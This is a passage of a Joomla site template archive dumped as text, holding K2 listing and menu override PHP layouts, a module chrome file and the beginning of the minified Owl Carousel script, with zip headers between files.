			<?php endif; ?>

			<?php if ($this->params->get('genericItemReadMore')): ?>
			<!-- Item "read more..." link -->
			<div class="genericItemReadMore">
				<a class="k2ReadMore" href="<?php echo $item->link; ?>">
					<?php echo JText::_('K2_READ_MORE'); ?>
				</a>
			</div>
			<?php endif; ?>

			<div class="clr"></div>
		</div>
		<!-- End K2 Item Layout -->

		<?php endforeach; ?>
	</div>

	<!-- Pagination -->
	<?php if($this->pagination->getPagesLinks()): ?>
	<div class="k2Pagination">
		<?php echo $this->pagination->getPagesLinks(); ?>
		<div class="clr"></div>
		<?php echo $this->pagination->getPagesCounter(); ?>
	</div>
	<?php endif; ?>

	<?php else: ?>

	<?php if(!$this->params->get('googleSearch')): ?>
	<!-- No results found -->
	<div id="genericItemListNothingFound">
		<p><?php echo JText::_('K2_NO_RESULTS_FOUND'); ?></p>
	</div>
	<?php endif; ?>

	<?php endif; ?>

</div>
<!-- End K2 Generic (search/date) Layout -->
PK!�����-bizone/html/mod_menu/default-agency-aside.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_menu
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Note. It is important to remove spaces between elements.
?>
<?php // The menu class is deprecated. Use nav instead. ?>
<ul class="push_nav <?php echo $class_sfx;?>"<?php
	$tag = '';

	if ($params->get('tag_id') != null)
	{
		$tag = $params->get('tag_id') . '';
		echo ' id="' . $tag . '"';
	}
?>>
<?php
foreach ($list as $i => &$item)
{
	$class = 'item-' . $item->id;

	if (($item->id == $active_id) OR ($item->type == 'alias' AND $item->params->get('aliasoptions') == $active_id))
	{
		$class .= ' current';
	}

	if (in_array($item->id, $path))
	{
		$class .= ' active';
	}
	elseif ($item->type == 'alias')
	{
		$aliasToId = $item->params->get('aliasoptions');

		if (count($path) > 0 && $aliasToId == $path[count($path) - 1])
		{
			$class .= ' active';
		}
		elseif (in_array($aliasToId, $path))
		{
			$class .= ' alias-parent-active';
		}
	}

	if ($item->type == 'separator')
	{
		$class .= ' divider';
	}

	if ($item->deeper)
	{
		$class .= ' deeper';
	}

	if ($item->parent)
	{
		$class .= ' parent dropdown';
	}

	if (!empty($class))
	{
		$class = ' class="' . trim($class) . '"';
	}

	echo '<li' . $class . '>';

	// Render the menu item.
	switch ($item->type) :
		case 'separator':
		case 'url':
		case 'component':
		case 'heading':
			require JModuleHelper::getLayoutPath('mod_menu', 'default_' . $item->type);
			break;

		default:
			require JModuleHelper::getLayoutPath('mod_menu', 'default_url');
			break;
	endswitch;

	// The next item is deeper.
	if ($item->deeper)
	{
		echo '<ul class="nav-child unstyled small dropdown-menu">';
	}
	elseif ($item->shallower)
	{
		// The next item is shallower.
		echo '</li>';
		echo str_repeat('</ul></li>', $item->level_diff);
	}
	else
	{
		// The next item is on the same level.
		echo '</li>';
	}
}
?></ul>
PK!?F� bizone/html/mod_menu/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_menu
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Note. It is important to remove spaces between elements.
?>
<?php // The menu class is deprecated. Use nav instead. ?>
<ul class="nav navbar-nav nnayax-nav-menu nayax-menu <?php echo $class_sfx;?>"<?php
	$tag = '';

	if ($params->get('tag_id') != null)
	{
		$tag = $params->get('tag_id') . '';
		echo ' id="' . $tag . '"';
	}
?>>
<?php
foreach ($list as $i => &$item)
{
	$class = 'item-' . $item->id;

	if (($item->id == $active_id) OR ($item->type == 'alias' AND $item->params->get('aliasoptions') == $active_id))
	{
		$class .= ' current';
	}

	if (in_array($item->id, $path))
	{
		$class .= ' active';
	}
	elseif ($item->type == 'alias')
	{
		$aliasToId = $item->params->get('aliasoptions');

		if (count($path) > 0 && $aliasToId == $path[count($path) - 1])
		{
			$class .= ' active';
		}
		elseif (in_array($aliasToId, $path))
		{
			$class .= ' alias-parent-active';
		}
	}

	if ($item->type == 'separator')
	{
		$class .= ' divider';
	}

	if ($item->deeper)
	{
		$class .= ' deeper';
	}

	if ($item->parent)
	{
		$class .= ' parent dropdown';
	}

	if (!empty($class))
	{
		$class = ' class="' . trim($class) . '"';
	}

	echo '<li' . $class . '>';

	// Render the menu item.
	switch ($item->type) :
		case 'separator':
		case 'url':
		case 'component':
		case 'heading':
			require JModuleHelper::getLayoutPath('mod_menu', 'default_' . $item->type);
			break;

		default:
			require JModuleHelper::getLayoutPath('mod_menu', 'default_url');
			break;
	endswitch;

	// The next item is deeper.
	if ($item->deeper)
	{
		echo '<ul class="nav-child unstyled small dropdown-menu">';
	}
	elseif ($item->shallower)
	{
		// The next item is shallower.
		echo '</li>';
		echo str_repeat('</ul></li>', $item->level_diff);
	}
	else
	{
		// The next item is on the same level.
		echo '</li>';
	}
}
?></ul>
PK!~N���(bizone/html/mod_menu/default_heading.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_menu
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$title = $item->anchor_title ? ' title="' . $item->anchor_title . '"' : '';
$anchor_css = $item->anchor_css ? $item->anchor_css : '';

$linktype = $item->title;

if ($item->menu_image)
{
	$linktype = JHtml::_('image', $item->menu_image, $item->title);

	if ($item->params->get('menu_text', 1))
	{
		$linktype .= '<span class="image-title">' . $item->title . '</span>';
	}
}

?>
<span class="nav-header <?php echo $anchor_css; ?>"<?php echo $title; ?>><?php echo $linktype; ?></span>
PK!���*bizone/html/mod_menu/default_component.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_menu
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Note. It is important to remove spaces between elements.
$class = $item->anchor_css ? 'class="' . $item->anchor_css . '" ' : '';
$title = $item->anchor_title ? 'title="' . $item->anchor_title . '" ' : '';

if($item->parent){
	$class = $item->anchor_css ? 'class="dropdown-toggle ' . $item->anchor_css . '" ' : 'class="dropdown-toggle " ';
	$class .= ' data-toggle="dropdown" ';
} else {
	$class = $item->anchor_css ? 'class="' . $item->anchor_css . '" ' : '';
}

if ($item->menu_image)
{
	$item->params->get('menu_text', 1) ?
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" /><span class="image-title">' . $item->title . '</span> ' :
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" />';
}
else
{
	$linktype = $item->title;
}

switch ($item->browserNav)
{
	default:
	case 0:
?><a <?php echo $class; ?>href="<?php echo $item->flink; ?>" <?php echo $title; ?>><?php echo $linktype; ?></a><?php
		break;
	case 1:
		// _blank
?><a <?php echo $class; ?>href="<?php echo $item->flink; ?>" target="_blank" <?php echo $title; ?>><?php echo $linktype; ?></a><?php
		break;
	case 2:
	// Use JavaScript "window.open"
?><a <?php echo $class; ?>href="<?php echo $item->flink; ?>" onclick="window.open(this.href,'targetWindow','toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes');return false;" <?php echo $title; ?>><?php echo $linktype; ?></a>
<?php
		break;
}
PK![�w���*bizone/html/mod_menu/default_separator.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_menu
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$title = $item->anchor_title ? ' title="' . $item->anchor_title . '"' : '';
$anchor_css = $item->anchor_css ? $item->anchor_css : '';

$linktype = $item->title;

if ($item->menu_image)
{
	$linktype = JHtml::_('image', $item->menu_image, $item->title);

	if ($item->params->get('menu_text', 1))
	{
		$linktype .= '<span class="image-title">' . $item->title . '</span>';
	}
}

?>
<span class="separator <?php echo $anchor_css; ?>"<?php echo $title; ?>><?php echo $linktype; ?></span>
PK!u���zz$bizone/html/mod_menu/default_url.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_menu
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Note. It is important to remove spaces between elements.
$class = $item->anchor_css ? 'class="' . $item->anchor_css . '" ' : '';
$title = $item->anchor_title ? 'title="' . $item->anchor_title . '" ' : '';
$rel   = $item->anchor_rel ? 'rel="' . $item->anchor_rel . '" ' : '';

if($item->parent){
	$class = $item->anchor_css ? 'class="page-scroll ' . $item->anchor_css . '" ' : 'class="page-scroll"';
} else {
	$class = $item->anchor_css ? 'class="page-scroll ' . $item->anchor_css . '" ' : 'class="page-scroll"';
}
if ($item->menu_image)
{
	$item->params->get('menu_text', 1) ?
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" /><span class="image-title">' . $item->title . '</span> ' :
	$linktype = '<img src="' . $item->menu_image . '" alt="' . $item->title . '" />';
}
else
{
	$linktype = $item->title;
}
$flink = $item->flink;
$flink = JFilterOutput::ampReplace(htmlspecialchars($flink));

switch ($item->browserNav) :
	default:
	case 0:
?><a <?php echo $class; ?>href="<?php echo $flink; ?>" <?php echo $title . $rel; ?>><?php echo $linktype; ?></a><?php
		break;
	case 1:
		// _blank
?><a <?php echo $class; ?>href="<?php echo $flink; ?>" target="_blank" <?php echo $title . $rel; ?>><?php echo $linktype; ?></a><?php
		break;
	case 2:
		// Use JavaScript "window.open"
		$options = 'toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes,' . $params->get('window_open');
			?><a <?php echo $class; ?>href="<?php echo $flink; ?>" onclick="window.open(this.href,'targetWindow','<?php echo $options;?>');return false;" <?php echo $title; ?>><?php echo $linktype; ?></a><?php
		break;
endswitch;
PK!WA�bizone/html/modules.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * This is a file to add template specific chrome to module rendering.  To use it you would
 * set the style attribute for the given module(s) include in your template to use the style
 * for each given modChrome function.
 *
 * eg. To render a module mod_test in the submenu style, you would use the following include:
 * <jdoc:include type="module" name="test" style="submenu" />
 *
 * This gives template designers ultimate control over how modules are rendered.
 *
 * NOTICE: All chrome wrapping methods should be named: modChrome_{STYLE} and take the same
 * two arguments.
 */

/*
 * Module chrome for rendering the module in a submenu
 */
function modChrome_no($module, &$params, &$attribs)
{
	if ($module->content)
	{
		echo $module->content;
	}
}

function modChrome_well($module, &$params, &$attribs)
{
	if ($module->content)
	{
		echo "<div class=\"well " . htmlspecialchars($params->get('moduleclass_sfx')) . "\">";
		if ($module->showtitle)
		{
			echo "<h3 class=\"page-header\">" . $module->title . "</h3>";
		}
		echo $module->content;
		echo "</div>";
	}
}

function modChrome_widget($module, &$params, &$attribs)
{
	if ($module->content)
	{
		echo "<div class=\"widget " . htmlspecialchars($params->get('moduleclass_sfx')) . "\">";
		if ($module->showtitle)
		{
			echo "<div class='widget-title ". htmlspecialchars($params->get('moduleclass_sfx')) ."'><h4>" . $module->title . "</h4></div>";
		}
		echo $module->content;
		echo "</div>";
	}
}
?>
PK!n��EE.bizone/html/mod_k2_content/Default/default.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;
?>
<div id="k2ModuleBox<?php echo $module->id; ?>" class="widget widget_recent_post <?php if($params->get('moduleclass_sfx')) echo ' '.$params->get('moduleclass_sfx'); ?>">
    <ul class="category">
    <?php if(count($items)): foreach ($items as $key=>$item):	?>
        <?php 
            $date = new DateTime($item->created);
        ?>
        <li><a href="<?php echo $item->link; ?>"><?php echo $item->title; ?><span class="date"><?php echo $date->format('m F, Y'); ?></span></a></li>
	<?php endforeach; endif; ?>
    </ul>
</div>PK!��D�]�]bizone/js/owl.carousel.min.jsnu&1i�"function"!==typeof Object.create&&(Object.create=function(f){function g(){}g.prototype=f;return new g});
(function(f,g,k){var l={init:function(a,b){this.$elem=f(b);this.options=f.extend({},f.fn.owlCarousel.options,this.$elem.data(),a);this.userOptions=a;this.loadContent()},loadContent:function(){function a(a){var d,e="";if("function"===typeof b.options.jsonSuccess)b.options.jsonSuccess.apply(this,[a]);else{for(d in a.owl)a.owl.hasOwnProperty(d)&&(e+=a.owl[d].item);b.$elem.html(e)}b.logIn()}var b=this,e;"function"===typeof b.options.beforeInit&&b.options.beforeInit.apply(this,[b.$elem]);"string"===typeof b.options.jsonPath?
(e=b.options.jsonPath,f.getJSON(e,a)):b.logIn()},logIn:function(){this.$elem.data("owl-originalStyles",this.$elem.attr("style"));this.$elem.data("owl-originalClasses",this.$elem.attr("class"));this.$elem.css({opacity:0});this.orignalItems=this.options.items;this.checkBrowser();this.wrapperWidth=0;this.checkVisible=null;this.setVars()},setVars:function(){if(0===this.$elem.children().length)return!1;this.baseClass();this.eventTypes();this.$userItems=this.$elem.children();this.itemsAmount=this.$userItems.length;
this.wrapItems();this.$owlItems=this.$elem.find(".owl-item");this.$owlWrapper=this.$elem.find(".owl-wrapper");this.playDirection="next";this.prevItem=0;this.prevArr=[0];this.currentItem=0;this.customEvents();this.onStartup()},onStartup:function(){this.updateItems();this.calculateAll();this.buildControls();this.updateControls();this.response();this.moveEvents();this.stopOnHover();this.owlStatus();!1!==this.options.transitionStyle&&this.transitionTypes(this.options.transitionStyle);!0===this.options.autoPlay&&
(this.options.autoPlay=5E3);this.play();this.$elem.find(".owl-wrapper").css("display","block");this.$elem.is(":visible")?this.$elem.css("opacity",1):this.watchVisibility();this.onstartup=!1;this.eachMoveUpdate();"function"===typeof this.options.afterInit&&this.options.afterInit.apply(this,[this.$elem])},eachMoveUpdate:function(){!0===this.options.lazyLoad&&this.lazyLoad();!0===this.options.autoHeight&&this.autoHeight();this.onVisibleItems();"function"===typeof this.options.afterAction&&this.options.afterAction.apply(this,
[this.$elem])},updateVars:function(){"function"===typeof this.options.beforeUpdate&&this.options.beforeUpdate.apply(this,[this.$elem]);this.watchVisibility();this.updateItems();this.calculateAll();this.updatePosition();this.updateControls();this.eachMoveUpdate();"function"===typeof this.options.afterUpdate&&this.options.afterUpdate.apply(this,[this.$elem])},reload:function(){var a=this;g.setTimeout(function(){a.updateVars()},0)},watchVisibility:function(){var a=this;if(!1===a.$elem.is(":visible"))a.$elem.css({opacity:0}),
g.clearInterval(a.autoPlayInterval),g.clearInterval(a.checkVisible);else return!1;a.checkVisible=g.setInterval(function(){a.$elem.is(":visible")&&(a.reload(),a.$elem.animate({opacity:1},200),g.clearInterval(a.checkVisible))},500)},wrapItems:function(){this.$userItems.wrapAll('<div class="owl-wrapper">').wrap('<div class="owl-item"></div>');this.$elem.find(".owl-wrapper").wrap('<div class="owl-wrapper-outer">');this.wrapperOuter=this.$elem.find(".owl-wrapper-outer");this.$elem.css("display","block")},
baseClass:function(){var a=this.$elem.hasClass(this.options.baseClass),b=this.$elem.hasClass(this.options.theme);a||this.$elem.addClass(this.options.baseClass);b||this.$elem.addClass(this.options.theme)},updateItems:function(){var a,b;if(!1===this.options.responsive)return!1;if(!0===this.options.singleItem)return this.options.items=this.orignalItems=1,this.options.itemsCustom=!1,this.options.itemsDesktop=!1,this.options.itemsDesktopSmall=!1,this.options.itemsTablet=!1,this.options.itemsTabletSmall=
!1,this.options.itemsMobile=!1;a=f(this.options.responsiveBaseWidth).width();a>(this.options.itemsDesktop[0]||this.orignalItems)&&(this.options.items=this.orignalItems);if(!1!==this.options.itemsCustom)for(this.options.itemsCustom.sort(function(a,b){return a[0]-b[0]}),b=0;b<this.options.itemsCustom.length;b+=1)this.options.itemsCustom[b][0]<=a&&(this.options.items=this.options.itemsCustom[b][1]);else a<=this.options.itemsDesktop[0]&&!1!==this.options.itemsDesktop&&(this.options.items=this.options.itemsDesktop[1]),
a<=this.options.itemsDesktopSmall[0]&&!1!==this.options.itemsDesktopSmall&&(this.options.items=this.options.itemsDesktopSmall[1]),a<=this.options.itemsTablet[0]&&!1!==this.options.itemsTablet&&(this.options.items=this.options.itemsTablet[1]),a<=this.options.itemsTabletSmall[0]&&!1!==this.options.itemsTabletSmall&&(this.options.items=this.options.itemsTabletSmall[1]),a<=this.options.itemsMobile[0]&&!1!==this.options.itemsMobile&&(this.options.items=this.options.itemsMobile[1]);this.options.items>this.itemsAmount&&
!0===this.options.itemsScaleUp&&(this.options.items=this.itemsAmount)},response:function(){var a=this,b,e;if(!0!==a.options.responsive)return!1;e=f(g).width();a.resizer=function(){f(g).width()!==e&&(!1!==a.options.autoPlay&&g.clearInterval(a.autoPlayInterval),g.clearTimeout(b),b=g.setTimeout(function(){e=f(g).width();a.updateVars()},a.options.responsiveRefreshRate))};f(g).resize(a.resizer)},updatePosition:function(){this.jumpTo(this.currentItem);!1!==this.options.autoPlay&&this.checkAp()},appendItemsSizes:function(){var a=
this,b=0,e=a.itemsAmount-a.options.items;a.$owlItems.each(function(c){var d=f(this);d.css({width:a.itemWidth}).data("owl-item",Number(c));if(0===c%a.options.items||c===e)c>e||(b+=1);d.data("owl-roundPages",b)})},appendWrapperSizes:function(){this.$owlWrapper.css({width:this.$owlItems.length*this.itemWidth*2,left:0});this.appendItemsSizes()},calculateAll:function(){this.calculateWidth();this.appendWrapperSizes();this.loops();this.max()},calculateWidth:function(){this.itemWidth=Math.round(this.$elem.width()/
this.options.items)},max:function(){var a=-1*(this.itemsAmount*this.itemWidth-this.options.items*this.itemWidth);this.options.items>this.itemsAmount?this.maximumPixels=a=this.maximumItem=0:(this.maximumItem=this.itemsAmount-this.options.items,this.maximumPixels=a);return a},min:function(){return 0},loops:function(){var a=0,b=0,e,c;this.positionsInArray=[0];this.pagesInArray=[];for(e=0;e<this.itemsAmount;e+=1)b+=this.itemWidth,this.positionsInArray.push(-b),!0===this.options.scrollPerPage&&(c=f(this.$owlItems[e]),
c=c.data("owl-roundPages"),c!==a&&(this.pagesInArray[a]=this.positionsInArray[e],a=c))},buildControls:function(){if(!0===this.options.navigation||!0===this.options.pagination)this.owlControls=f('<div class="owl-controls"/>').toggleClass("clickable",!this.browser.isTouch).appendTo(this.$elem);!0===this.options.pagination&&this.buildPagination();!0===this.options.navigation&&this.buildButtons()},buildButtons:function(){var a=this,b=f('<div class="owl-buttons"/>');a.owlControls.append(b);a.buttonPrev=
f("<div/>",{"class":"owl-prev",html:a.options.navigationText[0]||""});a.buttonNext=f("<div/>",{"class":"owl-next",html:a.options.navigationText[1]||""});b.append(a.buttonPrev).append(a.buttonNext);b.on("touchstart.owlControls mousedown.owlControls",'div[class^="owl"]',function(a){a.preventDefault()});b.on("touchend.owlControls mouseup.owlControls",'div[class^="owl"]',function(b){b.preventDefault();f(this).hasClass("owl-next")?a.next():a.prev()})},buildPagination:function(){var a=this;a.paginationWrapper=
f('<div class="owl-pagination"/>');a.owlControls.append(a.paginationWrapper);a.paginationWrapper.on("touchend.owlControls mouseup.owlControls",".owl-page",function(b){b.preventDefault();Number(f(this).data("owl-page"))!==a.currentItem&&a.goTo(Number(f(this).data("owl-page")),!0)})},updatePagination:function(){var a,b,e,c,d,g;if(!1===this.options.pagination)return!1;this.paginationWrapper.html("");a=0;b=this.itemsAmount-this.itemsAmount%this.options.items;for(c=0;c<this.itemsAmount;c+=1)0===c%this.options.items&&
(a+=1,b===c&&(e=this.itemsAmount-this.options.items),d=f("<div/>",{"class":"owl-page"}),g=f("<span></span>",{text:!0===this.options.paginationNumbers?a:"","class":!0===this.options.paginationNumbers?"owl-numbers":""}),d.append(g),d.data("owl-page",b===c?e:c),d.data("owl-roundPages",a),this.paginationWrapper.append(d));this.checkPagination()},checkPagination:function(){var a=this;if(!1===a.options.pagination)return!1;a.paginationWrapper.find(".owl-page").each(function(){f(this).data("owl-roundPages")===
f(a.$owlItems[a.currentItem]).data("owl-roundPages")&&(a.paginationWrapper.find(".owl-page").removeClass("active"),f(this).addClass("active"))})},checkNavigation:function(){if(!1===this.options.navigation)return!1;!1===this.options.rewindNav&&(0===this.currentItem&&0===this.maximumItem?(this.buttonPrev.addClass("disabled"),this.buttonNext.addClass("disabled")):0===this.currentItem&&0!==this.maximumItem?(this.buttonPrev.addClass("disabled"),this.buttonNext.removeClass("disabled")):this.currentItem===
this.maximumItem?(this.buttonPrev.removeClass("disabled"),this.buttonNext.addClass("disabled")):0!==this.currentItem&&this.currentItem!==this.maximumItem&&(this.buttonPrev.removeClass("disabled"),this.buttonNext.removeClass("disabled")))},updateControls:function(){this.updatePagination();this.checkNavigation();this.owlControls&&(this.options.items>=this.itemsAmount?this.owlControls.hide():this.owlControls.show())},destroyControls:function(){this.owlControls&&this.owlControls.remove()},next:function(a){if(this.isTransition)return!1;
this.currentItem+=!0===this.options.scrollPerPage?this.options.items:1;if(this.currentItem>this.maximumItem+(!0===this.options.scrollPerPage?this.options.items-1:0))if(!0===this.options.rewindNav)this.currentItem=0,a="rewind";else return this.currentItem=this.maximumItem,!1;this.goTo(this.currentItem,a)},prev:function(a){if(this.isTransition)return!1;this.currentItem=!0===this.options.scrollPerPage&&0<this.currentItem&&this.currentItem<this.options.items?0:this.currentItem-(!0===this.options.scrollPerPage?
this.options.items:1);if(0>this.currentItem)if(!0===this.options.rewindNav)this.currentItem=this.maximumItem,a="rewind";else return this.currentItem=0,!1;this.goTo(this.currentItem,a)},goTo:function(a,b,e){var c=this;if(c.isTransition)return!1;"function"===typeof c.options.beforeMove&&c.options.beforeMove.apply(this,[c.$elem]);a>=c.maximumItem?a=c.maximumItem:0>=a&&(a=0);c.currentItem=c.owl.currentItem=a;if(!1!==c.options.transitionStyle&&"drag"!==e&&1===c.options.items&&!0===c.browser.support3d)return c.swapSpeed(0),
!0===c.browser.support3d?c.transition3d(c.positionsInArray[a]):c.css2slide(c.positionsInArray[a],1),c.afterGo(),c.singleItemTransition(),!1;a=c.positionsInArray[a];!0===c.browser.support3d?(c.isCss3Finish=!1,!0===b?(c.swapSpeed("paginationSpeed"),g.setTimeout(function(){c.isCss3Finish=!0},c.options.paginationSpeed)):"rewind"===b?(c.swapSpeed(c.options.rewindSpeed),g.setTimeout(function(){c.isCss3Finish=!0},c.options.rewindSpeed)):(c.swapSpeed("slideSpeed"),g.setTimeout(function(){c.isCss3Finish=!0},
c.options.slideSpeed)),c.transition3d(a)):!0===b?c.css2slide(a,c.options.paginationSpeed):"rewind"===b?c.css2slide(a,c.options.rewindSpeed):c.css2slide(a,c.options.slideSpeed);c.afterGo()},jumpTo:function(a){"function"===typeof this.options.beforeMove&&this.options.beforeMove.apply(this,[this.$elem]);a>=this.maximumItem||-1===a?a=this.maximumItem:0>=a&&(a=0);this.swapSpeed(0);!0===this.browser.support3d?this.transition3d(this.positionsInArray[a]):this.css2slide(this.positionsInArray[a],1);this.currentItem=
this.owl.currentItem=a;this.afterGo()},afterGo:function(){this.prevArr.push(this.currentItem);this.prevItem=this.owl.prevItem=this.prevArr[this.prevArr.length-2];this.prevArr.shift(0);this.prevItem!==this.currentItem&&(this.checkPagination(),this.checkNavigation(),this.eachMoveUpdate(),!1!==this.options.autoPlay&&this.checkAp());"function"===typeof this.options.afterMove&&this.prevItem!==this.currentItem&&this.options.afterMove.apply(this,[this.$elem])},stop:function(){this.apStatus="stop";g.clearInterval(this.autoPlayInterval)},
checkAp:function(){"stop"!==this.apStatus&&this.play()},play:function(){var a=this;a.apStatus="play";if(!1===a.options.autoPlay)return!1;g.clearInterval(a.autoPlayInterval);a.autoPlayInterval=g.setInterval(function(){a.next(!0)},a.options.autoPlay)},swapSpeed:function(a){"slideSpeed"===a?this.$owlWrapper.css(this.addCssSpeed(this.options.slideSpeed)):"paginationSpeed"===a?this.$owlWrapper.css(this.addCssSpeed(this.options.paginationSpeed)):"string"!==typeof a&&this.$owlWrapper.css(this.addCssSpeed(a))},
addCssSpeed:function(a){return{"-webkit-transition":"all "+a+"ms ease","-moz-transition":"all "+a+"ms ease","-o-transition":"all "+a+"ms ease",transition:"all "+a+"ms ease"}},removeTransition:function(){return{"-webkit-transition":"","-moz-transition":"","-o-transition":"",transition:""}},doTranslate:function(a){return{"-webkit-transform":"translate3d("+a+"px, 0px, 0px)","-moz-transform":"translate3d("+a+"px, 0px, 0px)","-o-transform":"translate3d("+a+"px, 0px, 0px)","-ms-transform":"translate3d("+
a+"px, 0px, 0px)",transform:"translate3d("+a+"px, 0px,0px)"}},transition3d:function(a){this.$owlWrapper.css(this.doTranslate(a))},css2move:function(a){this.$owlWrapper.css({left:a})},css2slide:function(a,b){var e=this;e.isCssFinish=!1;e.$owlWrapper.stop(!0,!0).animate({left:a},{duration:b||e.options.slideSpeed,complete:function(){e.isCssFinish=!0}})},checkBrowser:function(){var a=k.createElement("div");a.style.cssText="  -moz-transform:translate3d(0px, 0px, 0px); -ms-transform:translate3d(0px, 0px, 0px); -o-transform:translate3d(0px, 0px, 0px); -webkit-transform:translate3d(0px, 0px, 0px); transform:translate3d(0px, 0px, 0px)";
a=a.style.cssText.match(/translate3d\(0px, 0px, 0px\)/g);this.browser={support3d:null!==a&&1===a.length,isTouch:"ontouchstart"in g||g.navigator.msMaxTouchPoints}},moveEvents:function(){if(!1!==this.options.mouseDrag||!1!==this.options.touchDrag)this.gestures(),this.disabledEvents()},eventTypes:function(){var a=["s","e","x"];this.ev_types={};!0===this.options.mouseDrag&&!0===this.options.touchDrag?a=["touchstart.owl mousedown.owl","touchmove.owl mousemove.owl","touchend.owl touchcancel.owl mouseup.owl"]:
!1===this.options.mouseDrag&&!0===this.options.touchDrag?a=["touchstart.owl","touchmove.owl","touchend.owl touchcancel.owl"]:!0===this.options.mouseDrag&&!1===this.options.touchDrag&&(a=["mousedown.owl","mousemove.owl","mouseup.owl"]);this.ev_types.start=a[0];this.ev_types.move=a[1];this.ev_types.end=a[2]},disabledEvents:function(){this.$elem.on("dragstart.owl",function(a){a.preventDefault()});this.$elem.on("mousedown.disableTextSelect",function(a){return f(a.target).is("input, textarea, select, option")})},
gestures:function(){function a(a){if(void 0!==a.touches)return{x:a.touches[0].pageX,y:a.touches[0].pageY};if(void 0===a.touches){if(void 0!==a.pageX)return{x:a.pageX,y:a.pageY};if(void 0===a.pageX)return{x:a.clientX,y:a.clientY}}}function b(a){"on"===a?(f(k).on(d.ev_types.move,e),f(k).on(d.ev_types.end,c)):"off"===a&&(f(k).off(d.ev_types.move),f(k).off(d.ev_types.end))}function e(b){b=b.originalEvent||b||g.event;d.newPosX=a(b).x-h.offsetX;d.newPosY=a(b).y-h.offsetY;d.newRelativeX=d.newPosX-h.relativePos;
"function"===typeof d.options.startDragging&&!0!==h.dragging&&0!==d.newRelativeX&&(h.dragging=!0,d.options.startDragging.apply(d,[d.$elem]));(8<d.newRelativeX||-8>d.newRelativeX)&&!0===d.browser.isTouch&&(void 0!==b.preventDefault?b.preventDefault():b.returnValue=!1,h.sliding=!0);(10<d.newPosY||-10>d.newPosY)&&!1===h.sliding&&f(k).off("touchmove.owl");d.newPosX=Math.max(Math.min(d.newPosX,d.newRelativeX/5),d.maximumPixels+d.newRelativeX/5);!0===d.browser.support3d?d.transition3d(d.newPosX):d.css2move(d.newPosX)}
function c(a){a=a.originalEvent||a||g.event;var c;a.target=a.target||a.srcElement;h.dragging=!1;!0!==d.browser.isTouch&&d.$owlWrapper.removeClass("grabbing");d.dragDirection=0>d.newRelativeX?d.owl.dragDirection="left":d.owl.dragDirection="right";0!==d.newRelativeX&&(c=d.getNewPosition(),d.goTo(c,!1,"drag"),h.targetElement===a.target&&!0!==d.browser.isTouch&&(f(a.target).on("click.disable",function(a){a.stopImmediatePropagation();a.stopPropagation();a.preventDefault();f(a.target).off("click.disable")}),
a=f._data(a.target,"events").click,c=a.pop(),a.splice(0,0,c)));b("off")}var d=this,h={offsetX:0,offsetY:0,baseElWidth:0,relativePos:0,position:null,minSwipe:null,maxSwipe:null,sliding:null,dargging:null,targetElement:null};d.isCssFinish=!0;d.$elem.on(d.ev_types.start,".owl-wrapper",function(c){c=c.originalEvent||c||g.event;var e;if(3===c.which)return!1;if(!(d.itemsAmount<=d.options.items)){if(!1===d.isCssFinish&&!d.options.dragBeforeAnimFinish||!1===d.isCss3Finish&&!d.options.dragBeforeAnimFinish)return!1;
!1!==d.options.autoPlay&&g.clearInterval(d.autoPlayInterval);!0===d.browser.isTouch||d.$owlWrapper.hasClass("grabbing")||d.$owlWrapper.addClass("grabbing");d.newPosX=0;d.newRelativeX=0;f(this).css(d.removeTransition());e=f(this).position();h.relativePos=e.left;h.offsetX=a(c).x-e.left;h.offsetY=a(c).y-e.top;b("on");h.sliding=!1;h.targetElement=c.target||c.srcElement}})},getNewPosition:function(){var a=this.closestItem();a>this.maximumItem?a=this.currentItem=this.maximumItem:0<=this.newPosX&&(this.currentItem=
